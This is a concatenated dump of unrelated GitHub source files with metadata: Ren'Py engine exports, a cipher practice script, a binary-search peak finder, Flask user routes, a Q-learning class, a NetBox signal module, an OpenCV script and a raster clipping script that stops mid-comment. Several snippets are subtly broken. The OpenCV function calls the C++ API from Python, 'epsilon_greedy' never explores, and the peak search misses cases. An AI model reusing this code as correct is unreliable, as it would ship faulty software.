the current context, that\r\n participates in rollback and the like.\r\n \"\"\"\r\n\r\n return renpy.game.context().info\r\n\r\ndef context_nesting_level():\r\n \"\"\"\r\n Returns the nesting level of the current context. 
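(For example, the level is 1 inside a context entered with\r\n ``renpy.call_in_new_context`` from the main context.)\r\n 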
This is 0 for the\r\n outermost context (the context that is saved, and in which most of\r\n the game runs), and greater than zero when in a menu or other nested\r\n context.\r\n \"\"\"\r\n\r\n return len(renpy.game.contexts) - 1\r\n \r\ndef music_start(filename, loops=True, fadeout=None, fadein=0):\r\n \"\"\"\r\n Deprecated music start function, retained for compatibility. Use\r\n renpy.music.play() or .queue() instead.\r\n \"\"\"\r\n\r\n renpy.audio.music.play(filename, loop=loops, fadeout=fadeout, fadein=fadein)\r\n\r\ndef music_stop(fadeout=None):\r\n \"\"\"\r\n Deprecated music stop function, retained for compatibility. Use\r\n renpy.music.stop() instead.\r\n \"\"\"\r\n\r\n renpy.audio.music.stop(fadeout=fadeout)\r\n\r\ndef get_filename_line():\r\n \"\"\"\r\n Returns a pair giving the filename and line number of the current\r\n statement.\r\n \"\"\"\r\n\r\n n = renpy.game.script.namemap.get(renpy.game.context().current, None)\r\n \r\n if n is None:\r\n return \"unknown\", 0\r\n else:\r\n return n.filename, n.linenumber\r\n\r\n# The file that log() writes to.\r\nlogfile = None\r\n \r\ndef log(msg):\r\n \"\"\"\r\n If config.log is not set, this does nothing. Otherwise, it opens\r\n the logfile (if not already open), formats the message to 70\r\n columns, and prints it to the logfile.\r\n \"\"\"\r\n \r\n global logfile\r\n\r\n if not renpy.config.log:\r\n return\r\n\r\n if msg is None:\r\n return\r\n\r\n if not logfile:\r\n import codecs\r\n\r\n logfile = _file(renpy.config.log, \"a\")\r\n if not logfile.tell():\r\n logfile.write(codecs.BOM_UTF8)\r\n\r\n import textwrap\r\n\r\n print >>logfile, textwrap.fill(msg).encode(\"utf-8\")\r\n logfile.flush()\r\n \r\ndef force_full_redraw():\r\n \"\"\"\r\n Forces the screen to be redrawn in full. Call this after using pygame\r\n to redraw the screen directly.\r\n \"\"\"\r\n\r\n renpy.game.interface.full_redraw = True\r\n\r\ndef do_reshow_say(who, what, interact=False):\r\n \r\n if who is not None:\r\n who = renpy.python.py_eval(who)\r\n\r\n say(who, what, interact=interact)\r\n\r\ncurried_do_reshow_say = curry(do_reshow_say)\r\n \r\ndef get_reshow_say(**kwargs):\r\n return curried_do_reshow_say(\r\n renpy.store._last_say_who,\r\n renpy.store._last_say_what,\r\n **kwargs)\r\n\r\ndef reshow_say(**kwargs):\r\n get_reshow_say()(**kwargs)\r\n\r\ndef current_interact_type():\r\n return getattr(renpy.game.context().info, \"_current_interact_type\", None)\r\n\r\ndef last_interact_type():\r\n return getattr(renpy.game.context().info, \"_last_interact_type\", None)\r\n\r\ndef dynamic(*vars): #@ReservedAssignment\r\n renpy.game.context().make_dynamic(vars)\r\n\r\ndef context_dynamic(*vars): #@ReservedAssignment\r\n renpy.game.context().make_dynamic(vars, context=True)\r\n \r\ndef seen_label(label):\r\n return label in renpy.game.seen_ever\r\n\r\ndef seen_audio(filename):\r\n return filename in renpy.game.persistent._seen_audio\r\n\r\ndef seen_image(name):\r\n if not isinstance(name, tuple):\r\n name = tuple(name.split())\r\n \r\n return name in renpy.game.persistent._seen_images\r\n\r\ndef file(fn): #@ReservedAssignment\r\n return renpy.loader.load(fn)\r\n\r\ndef image_size(im):\r\n \"\"\"\r\n :doc: other\r\n\r\n Given an image manipulator, loads it and returns a (``width``,\r\n ``height``) tuple giving its size.\r\n\r\n This reads the image in from disk and decompresses it, without\r\n using the image cache. 
This can be slow.\r\n \"\"\"\r\n \r\n # Index the archives, if we haven't already.\r\n renpy.loader.index_archives()\r\n\r\n im = renpy.easy.displayable(im)\r\n\r\n if not isinstance(im, renpy.display.im.Image):\r\n raise Exception(\"renpy.image_size expects it's argument to be an image.\")\r\n\r\n surf = im.load()\r\n return surf.get_size()\r\n\r\ndef get_at_list(name, layer='master'):\r\n if isinstance(name, basestring):\r\n name = tuple(name.split())\r\n\r\n tag = name[0]\r\n\r\n return renpy.game.context().scene_lists.at_list[layer].get(tag, None)\r\n\r\ndef layer_at_list(at_list, layer='master'):\r\n renpy.game.context().scene_lists.set_layer_at_list(layer, at_list)\r\n\r\ndef free_memory():\r\n force_full_redraw()\r\n renpy.display.interface.kill_textures_and_surfaces()\r\n\r\ndef easy_displayable(d, none=False):\r\n if none:\r\n return renpy.easy.displayable(d)\r\n else:\r\n return renpy.easy.displayable_or_none(d)\r\n\r\ndef quit_event():\r\n renpy.game.interface.quit_event()\r\n\r\ndef iconify():\r\n renpy.game.interface.iconify()\r\n \r\n# New context stuff.\r\ncall_in_new_context = renpy.game.call_in_new_context\r\ncurried_call_in_new_context = renpy.curry.curry(renpy.game.call_in_new_context)\r\ninvoke_in_new_context = renpy.game.invoke_in_new_context\r\ncurried_invoke_in_new_context = renpy.curry.curry(renpy.game.invoke_in_new_context)\r\n\r\n# Error handling stuff.\r\ndef _error(msg):\r\n raise Exception(msg)\r\n \r\n_error_handlers = [ _error ]\r\n \r\ndef push_error_handler(eh):\r\n _error_handlers.append(eh)\r\n\r\ndef pop_error_handler():\r\n _error_handlers.pop()\r\n\r\ndef error(msg):\r\n _error_handlers[-1](msg)\r\n \r\ndef timeout(seconds):\r\n \"\"\"\r\n :doc: udd_utility\r\n \r\n Causes an event to be generated before `seconds` seconds have elapsed.\r\n This ensures that the event method of a user-defined displayable will be\r\n called.\r\n \"\"\"\r\n \r\n renpy.game.interface.timeout(seconds)\r\n\r\ndef scry():\r\n name = renpy.game.context().current\r\n node = renpy.game.script.lookup(name)\r\n return node.scry()\r\n\r\ndef munged_filename():\r\n return renpy.parser.munge_filename(get_filename_line()[0])\r\n\r\n# Module loading stuff.\r\n\r\nloaded_modules = set()\r\n\r\ndef load_module(name, **kwargs):\r\n\r\n if not renpy.game.context().init_phase:\r\n raise Exception(\"Module loading is only allowed in init code.\")\r\n\r\n if name in loaded_modules:\r\n return\r\n\r\n loaded_modules.add(name)\r\n \r\n old_locked = renpy.config.locked\r\n renpy.config.locked = False\r\n \r\n initcode = renpy.game.script.load_module(name)\r\n\r\n context = renpy.execution.Context(False)\r\n context.init_phase = True\r\n renpy.game.contexts.append(context)\r\n \r\n context.make_dynamic(kwargs)\r\n renpy.store.__dict__.update(kwargs) #@UndefinedVariable\r\n \r\n for prio, node in initcode: #@UnusedVariable\r\n renpy.game.context().run(node)\r\n\r\n context.pop_all_dynamic()\r\n \r\n renpy.game.contexts.pop()\r\n\r\n renpy.config.locked = old_locked\r\n\r\ndef pop_return():\r\n renpy.game.context().pop_dynamic()\r\n renpy.game.context().lookup_return(pop=True)\r\n \r\ndef game_menu(screen=None):\r\n if screen is None:\r\n call_in_new_context(\"_game_menu\")\r\n else:\r\n call_in_new_context(\"_game_menu\", screen)\r\n\r\ndef shown_window():\r\n renpy.game.context().scene_lists.shown_window = True\r\n\r\nclass placement(renpy.python.RevertableObject):\r\n def __init__(self, p):\r\n super(placement, self).__init__()\r\n\r\n self.xpos = p[0]\r\n self.ypos = p[1]\r\n self.xanchor = 
p[2]\r\n self.yanchor = p[3]\r\n self.xoffset = p[4]\r\n self.yoffset = p[5]\r\n self.subpixel = p[6]\r\n\r\ndef get_placement(d):\r\n p = d.get_placement()\r\n\r\n return placement(p)\r\n \r\n# User-Defined Displayable stuff.\r\n\r\nRender = renpy.display.render.Render\r\nrender = renpy.display.render.render\r\nIgnoreEvent = renpy.display.core.IgnoreEvent\r\nredraw = renpy.display.render.redraw\r\n\r\nclass Displayable(renpy.display.core.Displayable, renpy.python.RevertableObject):\r\n pass\r\n\r\nclass Container(renpy.display.core.Displayable, renpy.python.RevertableObject):\r\n _list_type = renpy.python.RevertableList\r\n \r\ndef get_roll_forward():\r\n return renpy.game.interface.shown_window\r\n\r\ndef cache_pin(*args):\r\n \r\n new_pins = renpy.python.RevertableSet()\r\n\r\n for i in args:\r\n\r\n im = renpy.easy.displayable(i)\r\n\r\n if not isinstance(im, renpy.display.im.ImageBase):\r\n raise Exception(\"Cannot pin non-image-manipulator %r\" % im)\r\n\r\n new_pins.add(im)\r\n\r\n renpy.store._cache_pin_set = new_pins | renpy.store._cache_pin_set \r\n\r\n\r\ndef cache_unpin(*args):\r\n \r\n new_pins = renpy.python.RevertableSet()\r\n\r\n for i in args:\r\n\r\n im = renpy.easy.displayable(i)\r\n\r\n if not isinstance(im, renpy.display.im.ImageBase):\r\n raise Exception(\"Cannot unpin non-image-manipulator %r\" % im)\r\n\r\n new_pins.add(im)\r\n\r\n renpy.store._cache_pin_set = renpy.store._cache_pin_set - new_pins\r\n\r\n\r\n# This is a map from a definition to the place where it was\r\n# defined.\r\ndefinitions = collections.defaultdict(list)\r\n\r\ndef call_screen(_screen_name, **kwargs):\r\n \"\"\"\r\n :doc: screens\r\n\r\n The programmatic equivalent of the show screen statement.\r\n \r\n This shows `_screen_name` as a screen, then causes an interaction\r\n to occur. The screen is hidden at the end of the interaction, and\r\n the result of the interaction is returned.\r\n\r\n Keyword arguments not beginning with _ are passed to the scope of\r\n the screen.\r\n \"\"\"\r\n\r\n renpy.exports.mode('screen')\r\n \r\n show_screen(_screen_name, _transient=True, **kwargs)\r\n\r\n roll_forward = renpy.exports.roll_forward_info()\r\n\r\n try:\r\n rv = renpy.ui.interact(mouse=\"screen\", type=\"screen\", roll_forward=roll_forward)\r\n renpy.exports.checkpoint(rv)\r\n except renpy.game.JumpException:\r\n\r\n with_none = renpy.config.implicit_with_none\r\n if with_none:\r\n renpy.game.interface.do_with(None, None)\r\n\r\n raise\r\n\r\n with_none = renpy.config.implicit_with_none\r\n if with_none:\r\n renpy.game.interface.do_with(None, None)\r\n\r\n return rv\r\n \r\n \r\ndef list_files(common=False):\r\n \"\"\"\r\n :doc: other\r\n\r\n Lists the files in the game directory and archive files. Returns\r\n a list of files, with / as the directory separator.\r\n\r\n `common`\r\n If true, files in the common directory are included in the\r\n listing.\r\n \"\"\"\r\n\r\n rv = [ ]\r\n \r\n for dir, fn in renpy.loader.listdirfiles(): #@ReservedAssignment\r\n\r\n if not common and dir == renpy.config.commondir:\r\n continue\r\n\r\n rv.append(fn)\r\n\r\n return rv\r\n \r\ndef get_renderer_info():\r\n \"\"\"\r\n :doc: other\r\n\r\n Returns a dictionary, giving information about the renderer Ren'Py is\r\n currently using. 
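A typical check (sketch)::\r\n\r\n if renpy.get_renderer_info()[\"renderer\"] == \"sw\":\r\n pass # e.g. avoid effects that are costly without OpenGL\r\n\r\n 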
The dictionary has one required key:\r\n\r\n ``\"renderer\"``\r\n One of ``\"gl\"`` or ``\"sw\"``, corresponding to the OpenGL and\r\n software renderers, respectively.\r\n\r\n ``\"resizable``\r\n True if and only if the window is resizable.\r\n\r\n Other, renderer-specific, keys may also exist. The dictionary should\r\n be treated as immutable. This should only be called once the display\r\n has been started (that is, after the init code is finished).\r\n \"\"\"\r\n\r\n return renpy.display.draw.info\r\n \r\ndef display_reset():\r\n \"\"\"\r\n Used internally. Causes the display to be restarted at the start of\r\n the next interaction.\r\n \"\"\"\r\n \r\n renpy.display.interface.display_reset = True\r\n\r\ndef mode(mode):\r\n \"\"\"\r\n :doc: modes\r\n\r\n Causes Ren'Py to enter the named mode, or stay in that mode if it's\r\n already in it.\r\n \"\"\"\r\n\r\n ctx = renpy.game.context()\r\n\r\n if not ctx.use_modes:\r\n return\r\n\r\n modes = ctx.modes\r\n\r\n try:\r\n ctx.use_modes = False\r\n\r\n if mode != modes[0]: \r\n for c in renpy.config.mode_callbacks:\r\n c(mode, modes)\r\n\r\n finally:\r\n ctx.use_modes = True \r\n \r\n if mode in modes:\r\n modes.remove(mode)\r\n modes.insert(0, mode)\r\n\r\ndef notify(message):\r\n \"\"\"\r\n :doc: other\r\n\r\n Causes Ren'Py to display the `message` using the notify screen. By\r\n default, this will cause the message to be dissolved in, displayed\r\n for two seconds, and dissolved out again.\r\n\r\n This is useful for actions that otherwise wouldn't produce feedback,\r\n like screenshots or quicksaves.\r\n\r\n Only one notification is displayed at a time. If a second notification\r\n is displayed, the first notification is replaced. \r\n \"\"\"\r\n\r\n hide_screen('notify')\r\n show_screen('notify', message=message)\r\n restart_interaction()\r\n\r\ndef variant(name):\r\n \"\"\"\r\n :doc: screens\r\n\r\n Returns true if a `name` is a screen variant that can be chosen\r\n by Ren'Py. See :ref:`screen-variants` for more details. This function\r\n can be used as the condition in a python if statement to set up the\r\n appropriate styles for the selected screen variant.\r\n \"\"\"\r\n\r\n return name in renpy.config.variants\r\n\r\ndef vibrate(duration):\r\n \"\"\"\r\n :doc: other\r\n\r\n Causes the device to vibrate for `duration` seconds. Currently, this\r\n is only supported on Android.\r\n \"\"\"\r\n\r\n try:\r\n import android #@UnresolvedImport\r\n android.vibrate(duration)\r\n except:\r\n pass\r\n \r\n\r\n# The attributes that are applied to the current say statement.\r\nsay_attributes = None\r\n \r\ndef get_say_attributes():\r\n \"\"\"\r\n :doc: other\r\n\r\n Gets the attributes associated with the current say statement, or\r\n None if no attributes are associated with this statement.\r\n\r\n This is only valid when executing or predicting a say statement.\r\n \"\"\"\r\n\r\n return say_attributes\r\n\r\nside_image_attributes = None\r\n\r\ndef get_side_image(prefix_tag, image_tag=None, not_showing=True, layer='master'):\r\n \"\"\"\r\n :doc: other\r\n \r\n This attempts to find an image to show as the side image. \r\n \r\n It begins by determining a set of image attributes. If `image_tag` is \r\n given, it gets the image attributes from the tag. Otherwise, it gets\r\n them from the currently showing character.\r\n \r\n It then looks up an image with the tag `prefix_tag` and those attributes,\r\n and returns it if it exists. 
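For example (a sketch; the \"side\" prefix tag is the name conventionally\r\n used by say screens, and \"eileen\" is an assumed image tag)::\r\n\r\n img = renpy.get_side_image(\"side\", image_tag=\"eileen\")\r\n 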
\r\n \r\n If not_showing is True, this only returns a side image if the image the\r\n attributes are taken from is not on the screen.\r\n \"\"\"\r\n\r\n images = renpy.game.context().images\r\n\r\n if image_tag is not None:\r\n attrs = (image_tag,) + images.get_attributes(layer, image_tag)\r\n else:\r\n attrs = side_image_attributes\r\n \r\n if not attrs:\r\n return None\r\n \r\n if not_showing and images.showing(layer, (attrs[0], )):\r\n return None\r\n \r\n required = set()\r\n optional = set(attrs)\r\n \r\n return images.choose_image(prefix_tag, required, optional, None)\r\n\r\ndef get_physical_size():\r\n \"\"\"\r\n :doc: other\r\n \r\n Returns the size of the physical window.\r\n \"\"\"\r\n \r\n return renpy.display.draw.get_physical_size()\r\n\r\ndef set_physical_size(size):\r\n \"\"\"\r\n :doc: other\r\n \r\n Attempts to set the size of the physical window to size. This has the \r\n side effect of taking the screen out of windowed mode.\r\n \"\"\"\r\n\r\n renpy.game.preferences.fullscreen = False\r\n \r\n if get_renderer_info()[\"resizable\"]:\r\n renpy.display.interface.set_mode(size)\r\n \r\ndef fsencode(s):\r\n \"\"\"\r\n :doc: other\r\n \r\n Converts s from unicode to the filesystem encoding.\r\n \"\"\"\r\n \r\n if not isinstance(s, unicode):\r\n return s\r\n \r\n fsencoding = sys.getfilesystemencoding() or \"utf-8\"\r\n return s.encode(fsencoding, \"replace\")\r\n\r\ndef fsdecode(s):\r\n \"\"\"\r\n :doc: other\r\n \r\n Converts s from filesystem encoding to unicode.\r\n \"\"\"\r\n \r\n if not isinstance(s, str):\r\n return s\r\n \r\n fsencoding = sys.getfilesystemencoding() or \"utf-8\"\r\n return s.decode(fsencoding)\r\n\r\nfrom renpy.editor import launch_editor\r\n\r\n","repo_name":"paktek123/Renpy-Board-Framework","sub_path":"project_s/renpy/exports.py","file_name":"exports.py","file_ext":"py","file_size_in_byte":49677,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"25737182156","text":"#!/usr/bin/env python3\n'''\nThis program will encrypt a user provided text file against a random key.\nThis is intended to offer practice to the user for frequency analyses decryption\nof a substitution cypher\n'''\n\nimport random\n\n# Define the alphabet to be used by the rest of the script\n# Add additional characters or spaces if desired, though this\n# will change the normal frequency of each character!\nalph = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'\nkey = ''\nkeygen = list(alph)\nmapper = {}\n\n# Generate a random key for the encryption based on the alphabet defined above\nfor l in range(len(alph)):\n key += random.choice(keygen)\n keygen.remove(key[-1])\n\n# Create mapper dictionary for the encryption\ni = 0\nfor x in key:\n mapper[x] = alph[i]\n i +=1\n\n# Swap these lines if a dynamic PT is desired\n# pt = 'pt.txt'\npt = input(\"What is the name of the plaintext file?: \")\n\n# Save Plaintext as a string\nwith open(pt) as f:\n ptstring = f.read()\n\n# Create cypher text using plaintext string and mapper dictionary\nct = ''\nfor let in ptstring.upper():\n if let in alph:\n ct += mapper[let]\n\n# add spaces to final out string so it is in groups of 5 letters\ni = 0\nfin = ''\nfor let in ct:\n if i % 5 == 0:\n fin += ' ' + let \n\n else:\n fin += let\n \n i += 1\n \n# Save out string to a file for review\nwith open('out.txt', 'w') as f:\n 
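# note: fin starts with a leading space, since the i % 5 == 0 branch also\n # fires for the very first letter; this is harmless for the analysis\n 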
f.write(fin)\n","repo_name":"arcolvin/cryptoPractice","sub_path":"Substitution_Cipher/substitute.py","file_name":"substitute.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"28410686986","text":"####### two standard #######\nclass Solution:\n \"\"\"\n @param A: An integers array.\n @return: return any of peek positions.\n \"\"\"\n def findPeak(self, A):\n # A can be represented as a list of ++--++--\n # the first would be +, while the last would be - \n # find any ind that are +- \n if A is None or len(A) == 0:\n return -1 \n \n start, end = 0, len(A) - 1 \n while start + 1 < end:\n mid = start + (end - start) // 2 \n if mid > 0 and A[mid] < A[mid - 1]:\n end = mid \n elif mid > 0:\n if A[mid] > A[mid + 1]:\n return mid \n else:\n start = mid\n\n if start > 0 and A[start] > A[start - 1] and A[start] > A[start + 1]:\n return start \n # if end < len(A) - 1 and A[end] > A[end - 1] and A[end] > A[end + 1]:\n # return end \n \n return -1\n","repo_name":"KunyiLiu/algorithm_problems","sub_path":"kunyi/Binary Search/find-peak-element.py","file_name":"find-peak-element.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10111066313","text":"from app import db\nfrom api.models.user import User\nfrom api.models.test import Test\nfrom flask import request, Blueprint, make_response, jsonify\nfrom sqlalchemy.sql.expression import func, select\nuser_bp = Blueprint(\"user\", __name__, url_prefix=\"/api/user\")\n\n\n@user_bp.route(\"/\", methods=[\"POST\"])\ndef handle_new_user():\n if request.method == \"POST\":\n request_body = request.get_json()\n new_user = User(\n name=request_body[\"name\"],\n email=request_body[\"email\"])\n try:\n db.session.add(new_user)\n db.session.commit()\n user_response = {\n \"id\": new_user.id,\n \"name\": new_user.name,\n \"email\": new_user.email\n }\n return make_response(user_response, 201)\n except Exception as e:\n print(e)\n return make_response(f\"User was not created. 
Missing required fields.\", 400)\n\n\n@user_bp.route(\"/<user_id>\", methods=[\"GET\", \"PUT\", \"DELETE\"])\ndef handle_text_by_id(user_id):\n user = User.query.get(user_id)\n if not user:\n return make_response(f\"User #{user_id} Not Found\", 404)\n\n if request.method == \"GET\":\n user_response = {\n \"name\": user.name,\n \"email\": user.email\n }\n return make_response(user_response, 200)\n elif request.method == \"PUT\":\n form_data = request.get_json()\n\n user.name = form_data[\"name\"]\n user.email = form_data[\"email\"]\n\n db.session.commit()\n user_response = {\n \"id\": user.id,\n \"name\": user.name,\n \"email\": user.email\n }\n return make_response(user_response, 200)\n elif request.method == \"DELETE\":\n db.session.delete(user)\n db.session.commit()\n return make_response(f\"User # {user.id} successfully deleted\", 200)\n\n\n@user_bp.route(\"/<user_id>/tests\", methods=[\"GET\"])\ndef handle_user_tests(user_id):\n user = User.query.get(user_id)\n if not user:\n return make_response(f\"User #{user_id} Not Found\", 404)\n\n if request.method == \"GET\":\n tests = Test.query.filter_by(user_id=user.id).order_by(Test.id.desc())\n tests_response = []\n\n for test in tests:\n tests_response.append({\n \"id\": test.id,\n \"user_id\": test.user_id,\n \"category\": test.category,\n \"accuracy\": test.accuracy,\n \"timer\": test.timer,\n \"totalWordCount\": test.totalWordCount,\n \"wordsPerMin\": test.wordsPerMin,\n \"create_date\": test.create_date\n })\n user_response = {\n \"tests\": tests_response\n }\n return make_response(jsonify(user_response), 200)\n","repo_name":"gitburd/type-time","sub_path":"api/routes/userRoutes.py","file_name":"userRoutes.py","file_ext":"py","file_size_in_byte":2757,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
{"seq_id":"28567193873","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Apr 29 14:09:53 2019\r\n\r\n@author: Srujan Panuganti\r\n\"\"\"\r\n\r\nimport numpy as np\r\nfrom operator import add\r\nimport random\r\nimport copy\r\n\r\n\r\nclass q_learn:\r\n def __init__(self,\r\n total_actions,q_table,learning_rate = 0.6,discount_factor = 0.7,epsilon=0.6):\r\n\r\n self.total_actions = total_actions\r\n self.q_table = q_table\r\n \r\n self.number_of_states = 2** (self.total_actions)\r\n self.all_actions = [ 2**j for j in range(0,self.total_actions)]\r\n self.lin_space = list(range(0,self.total_actions))\r\n \r\n self.action_index = {}\r\n \r\n for key,val in zip(self.all_actions,self.lin_space ):\r\n self.action_index[key] = val\r\n\r\n\r\n self.learning_rate = learning_rate\r\n self.discount_factor = discount_factor \r\n self.epsilon = epsilon\r\n\r\n    def maximum_q(self, current_state, possible_actions):\r\n        max_q = 0\r\n        index = 0\r\n        max_i = 0\r\n        optimal_action = 0\r\n\r\n        # scan the possible actions, remembering the best q-value seen so far;\r\n        # index advances once per action, so max_i records the winner's position\r\n        for act in possible_actions:\r\n            q_val = self.q_table[current_state][self.action_index[act]][1]\r\n            if q_val >= max_q:\r\n                max_q = q_val\r\n                optimal_action = act\r\n                max_i = index\r\n            index += 1\r\n\r\n        return max_q,optimal_action,max_i\r\n\r\n\r\n    def epsilon_greedy(self, current_state, possible_actions):\r\n\r\n        pos_act = copy.deepcopy(possible_actions)\r\n\r\n        # NOTE: despite the name, no exploration happens here; this always\r\n        # returns the greedy action and self.epsilon is left unused\r\n        max_q, optimal_action, max_i = self.maximum_q(current_state, pos_act)\r\n\r\n        return optimal_action\r\n","repo_name":"srujanpanuganti/Dots-and-Boxes-Reinforcement-Learning","sub_path":"3x3 Random 
agent/q_algorithm.py","file_name":"q_algorithm.py","file_ext":"py","file_size_in_byte":1692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18654011344","text":"from multiprocessing import Pool\r\n\r\nimport time,os,random\r\n\r\ndef fu(num):\r\n for i in range(random.randint(1,6)):\r\n print(\"--%s开始运行---pid=%d\"%(num,os.getpid()))\r\n time.sleep(1)\r\n\r\nif __name__ == '__main__':\r\n po =Pool(3)\r\n\r\n for i in range(0,10):\r\n print(\"----%d----\"%i)\r\n po.apply_async(fu,(i,))\r\n\r\n print(\"----start----\")\r\n\r\n po.close()\r\n po.join()\r\n print(\"----over----\")","repo_name":"giant-xf/python","sub_path":"untitled/2.0-小白进阶篇/2.02-Linux系统编程/进程/复习/复习--进程池.py","file_name":"复习--进程池.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17067371334","text":"from django.db.models.signals import post_save, pre_delete\nfrom django.dispatch import receiver\n\nfrom .models import Cable, Device, VirtualChassis\n\n\n@receiver(post_save, sender=VirtualChassis)\ndef assign_virtualchassis_master(instance, created, **kwargs):\n \"\"\"\n When a VirtualChassis is created, automatically assign its master device to the VC.\n \"\"\"\n if created:\n Device.objects.filter(pk=instance.master.pk).update(virtual_chassis=instance, vc_position=None)\n\n\n@receiver(pre_delete, sender=VirtualChassis)\ndef clear_virtualchassis_members(instance, **kwargs):\n \"\"\"\n When a VirtualChassis is deleted, nullify the vc_position and vc_priority fields of its prior members.\n \"\"\"\n Device.objects.filter(virtual_chassis=instance.pk).update(vc_position=None, vc_priority=None)\n\n\n@receiver(post_save, sender=Cable)\ndef update_connected_endpoints(instance, **kwargs):\n \"\"\"\n When a Cable is saved, check for and update its two connected endpoints\n \"\"\"\n\n # Cache the Cable on its two termination points\n if instance.termination_a.cable != instance:\n instance.termination_a.cable = instance\n instance.termination_a.save()\n if instance.termination_b.cable != instance:\n instance.termination_b.cable = instance\n instance.termination_b.save()\n\n # Check if this Cable has formed a complete path. 
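# (the path is complete when both endpoints returned below are not None.)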
If so, update both endpoints.\n endpoint_a, endpoint_b, path_status = instance.get_path_endpoints()\n if endpoint_a is not None and endpoint_b is not None:\n endpoint_a.connected_endpoint = endpoint_b\n endpoint_a.connection_status = path_status\n endpoint_a.save()\n endpoint_b.connected_endpoint = endpoint_a\n endpoint_b.connection_status = path_status\n endpoint_b.save()\n\n\n@receiver(pre_delete, sender=Cable)\ndef nullify_connected_endpoints(instance, **kwargs):\n \"\"\"\n When a Cable is deleted, check for and update its two connected endpoints\n \"\"\"\n endpoint_a, endpoint_b, _ = instance.get_path_endpoints()\n\n # Disassociate the Cable from its termination points\n if instance.termination_a is not None:\n instance.termination_a.cable = None\n instance.termination_a.save()\n if instance.termination_b is not None:\n instance.termination_b.cable = None\n instance.termination_b.save()\n\n # If this Cable was part of a complete path, tear it down\n if hasattr(endpoint_a, 'connected_endpoint') and hasattr(endpoint_b, 'connected_endpoint'):\n endpoint_a.connected_endpoint = None\n endpoint_a.connection_status = None\n endpoint_a.save()\n endpoint_b.connected_endpoint = None\n endpoint_b.connection_status = None\n endpoint_b.save()\n","repo_name":"mtbutler07/netbox-heroku","sub_path":"netbox/dcim/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":2721,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"17542664660","text":"import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n'''\nimg = cv2.imread(\"Fondo.jpg\")\nprint(img)\ncv2.imshow('Prueba',img)\ncv2.waitKey(0)\n'''\n\ndef procesarImagen(direccionImagen):\n imagen = cv2.imread(direccionImagen)\n filasImagen = 0\n for filas in range(0, imagen.rows):\n for columnas in range(0, imagen.cols):\n colorAzul = imagen.at(filas, columnas)[0];\n print(colorAzul)\n return \n\nprocesarImagen(\"Fondo.jpg\")\n\n'''\n\nvoid uploadImageOneInfo(vector> &pImageOneInfo){\n /*\n Purpose: \n -Load the first image information and converts it to a matrix of colors for futures functionalities.\n Paramateres: \n -Recieves an empty matrix who is going to be filled with RGB colors.\n Returns: \n -Nothing. 
Void\n */\n \n string imagePath = \"C:/Users/luist/OneDrive/Escritorio/Proyecto1/Prueba1.png\";\n Mat colorImage = imread(imagePath);\n if(existsImage(colorImage)){\n int blueChannel; int greenChannel; int redChannel;\n int rowsImageOneInfo =0;\n for (int imageRows = 0; imageRows < colorImage.rows; imageRows+=54){\n for (int imageColumns = 0; imageColumns < colorImage.cols; imageColumns++) {\n redChannel = colorImage.at(imageRows, imageColumns)[2];\n greenChannel = colorImage.at(imageRows, imageColumns)[1];\n blueChannel = colorImage.at(imageRows, imageColumns)[0];\n\n Pixel addingPixel = Pixel(redChannel,greenChannel,blueChannel);\n\n pImageOneInfo[rowsImageOneInfo][imageColumns] = addingPixel;\n \n }\n rowsImageOneInfo++;\n }\n }\n else{\n exit(1);\n }\n \n}\n\n'''\n","repo_name":"LuisAraya2309/GeneticAlgorithms","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71416423273","text":"#This script is used to clip the raster file and get the shoreline following the sea level rise determined by user\n\nimport json\nimport shapely\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom osgeo import gdal\nfrom shapely.geometry import Point\nfrom shapely.geometry.polygon import Polygon\n\n#open the raster file\nelev_array=gdal.Open(r'/Users/ziyangliu/Downloads/WA_SEW_dems/WA_SEW1_GCS_5m_NAVD88m.tif')\nwidth=elev_array.RasterXSize \nheight=elev_array.RasterYSize\nulx, xres, xskew, uly, yskew, yres = elev_array.GetGeoTransform()\nprint(width,height)\nprint(uly+yres*height)\n#boundary of the clipped def file\nc_ulx, c_uly=-124.1610,46.9198\nc_lrx, c_lry= -124.0611,uly+yres*height\n# path to where you want the clipped raster\noutputSrtm = \"/Users/ziyangliu/Downloads/WA_SEW_dems/clip_WA_SEW1_GCS_5m_NAVD88m.tif\"\ngdal.Translate(outputSrtm , elev_array, \n projWin = (c_ulx, c_uly,\n c_lrx, c_lry)) # OR [ulx, uly, lrx, lry]\n\nc_elev_array=gdal.Open(r'/Users/ziyangliu/Downloads/WA_SEW_dems/clip_WA_SEW1_GCS_5m_NAVD88m.tif')\n\nc_width=c_elev_array.RasterXSize \nc_height=c_elev_array.RasterYSize\nc_ulx, c_xres, c_xskew, c_uly, c_yskew, c_yres = c_elev_array.GetGeoTransform()\nprint(\"before clip \",width,height,ulx, xres, xskew, uly, yskew, yres)\nprint(\"after clip \",c_width,c_height,c_ulx, c_xres, c_xskew, c_uly, c_yskew, c_yres)\n\nband1 = c_elev_array.GetRasterBand(1).ReadAsArray()\n\ndef getCoordinate(i,j):\n lon=c_ulx+c_xres*(j+1)\n lat=c_uly+c_yres*(i+1)\n return [lon,lat]\n\ndef elev_slr (x):\n mt = x*0.3048 #get the amount of sea level rise in unit of meter from feet\n band_mt = band1 - mt\n return band_mt\n\n#define a function, to determine the case of the rectangle. 
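#(each corner of the cell is tested against zero, giving a 4-bit index)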
